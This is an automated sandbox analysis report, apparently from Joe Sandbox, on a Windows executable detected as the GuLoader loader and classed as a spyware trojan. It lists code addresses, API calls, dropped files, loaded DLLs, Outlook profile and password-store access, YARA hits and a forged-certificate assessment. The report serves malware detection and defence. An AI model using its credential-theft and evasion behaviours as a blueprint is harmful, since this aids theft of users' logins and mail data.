Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812E1A0	12_2_3812E1A0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381267C0	12_2_381267C0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38120014	12_2_38120014
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812D200	12_2_3812D200
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38126E00	12_2_38126E00
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812A000	12_2_3812A000
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812EE20	12_2_3812EE20
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812BC20	12_2_3812BC20
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38128A20	12_2_38128A20
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812D840	12_2_3812D840
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38127440	12_2_38127440
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812A640	12_2_3812A640
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812F460	12_2_3812F460
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812C260	12_2_3812C260
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38129060	12_2_38129060
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38127A80	12_2_38127A80
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812AC80	12_2_3812AC80
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812FAA0	12_2_3812FAA0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812C8A0	12_2_3812C8A0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381296A0	12_2_381296A0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812E4C0	12_2_3812E4C0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812B2C0	12_2_3812B2C0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381280C0	12_2_381280C0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812CEE0	12_2_3812CEE0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38126AE0	12_2_38126AE0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38129CE0	12_2_38129CE0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812EB00	12_2_3812EB00
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38128700	12_2_38128700
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812B900	12_2_3812B900
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812D520	12_2_3812D520
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38127120	12_2_38127120
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812A320	12_2_3812A320
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812F140	12_2_3812F140
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812BF40	12_2_3812BF40
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38128D40	12_2_38128D40
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812DB60	12_2_3812DB60
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38127760	12_2_38127760
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812A960	12_2_3812A960
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812F780	12_2_3812F780
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812C580	12_2_3812C580
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38129380	12_2_38129380
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38127DA0	12_2_38127DA0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812AFA0	12_2_3812AFA0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812CBC0	12_2_3812CBC0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381299C0	12_2_381299C0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812E7E0	12_2_3812E7E0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381283E0	12_2_381283E0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3812B5E0	12_2_3812B5E0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38151C18	12_2_38151C18
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3815CC38	12_2_3815CC38
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38150040	12_2_38150040
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38156478	12_2_38156478
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38151530	12_2_38151530
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38157938	12_2_38157938
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3815E126	12_2_3815E126
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38158DF8	12_2_38158DF8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381529E8	12_2_381529E8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38150E48	12_2_38150E48
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381536B6	12_2_381536B6
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3815A2C2	12_2_3815A2C2
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38152300	12_2_38152300
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38154F27	12_2_38154F27
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38150728	12_2_38150728
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3815B77A	12_2_3815B77A
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38151C08	12_2_38151C08
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3815003A	12_2_3815003A
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3815CC60	12_2_3815CC60
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38151522	12_2_38151522
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381529D8	12_2_381529D8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38150E38	12_2_38150E38
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_381522F1	12_2_381522F1
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_3815071A	12_2_3815071A

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Code function: String function: 00402BCE appears 50 times

Source: CWu89IbJQw.exe

Static PE information: invalid certificate

Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004722000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CWu89IbJQw.exe
Source: CWu89IbJQw.exe, 0000000C.00000002.3609100488.0000000034CA7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs CWu89IbJQw.exe
Source: CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004722000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CWu89IbJQw.exe

Source: CWu89IbJQw.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/14@5/5

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403348
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		12_2_00403348

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File created: C:\Program Files (x86)\Hypotesers

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File created: C:\Users\user\AppData\Local\Temp\nsz787.tmp

Jump to behavior

Source: CWu89IbJQw.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003513D000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035149000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: CWu89IbJQw.exe	ReversingLabs: Detection: 70%
Source: CWu89IbJQw.exe	Virustotal: Detection: 72%

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File read: C:\Users\user\Desktop\CWu89IbJQw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging\dynamits\Tvejrs.ini

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: CWu89IbJQw.exe

Static file information: File size 1176848 > 1048576

Source: CWu89IbJQw.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2517702962.0000000003331000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3585420008.00000000022C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Code function: 0_2_738F1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_738F1A98

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_738F2F60 push eax; ret	0_2_738F2F8E
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04589C30 push esp; retf 045Ah	12_2_04589D55
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458891E pushad ; iretd	12_2_0458891F

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) The email domain 'Graphospasm.Mu' appears randomly generated and uses an unusual Mauritius TLD (.Mu), very suspicious for malware. 2) Organization 'Forankret' has no known reputation and appears fabricated. 3) The certificate is self-signed (issuer matches subject) which is a major red flag. 4) Certificate validation explicitly failed with untrusted root error. 5) The compilation timestamp (July 2021) is significantly older than the certificate creation date (Jan 2025), suggesting possible timestamp manipulation. 6) The unusual OU field 'Rapse outfront' appears meaningless/randomly generated. While the US location might seem legitimate, all other certificate attributes strongly indicate this is a fraudulent certificate likely created for malicious purposes.

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File created: C:\Users\user\AppData\Local\Temp\nsf7A8.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
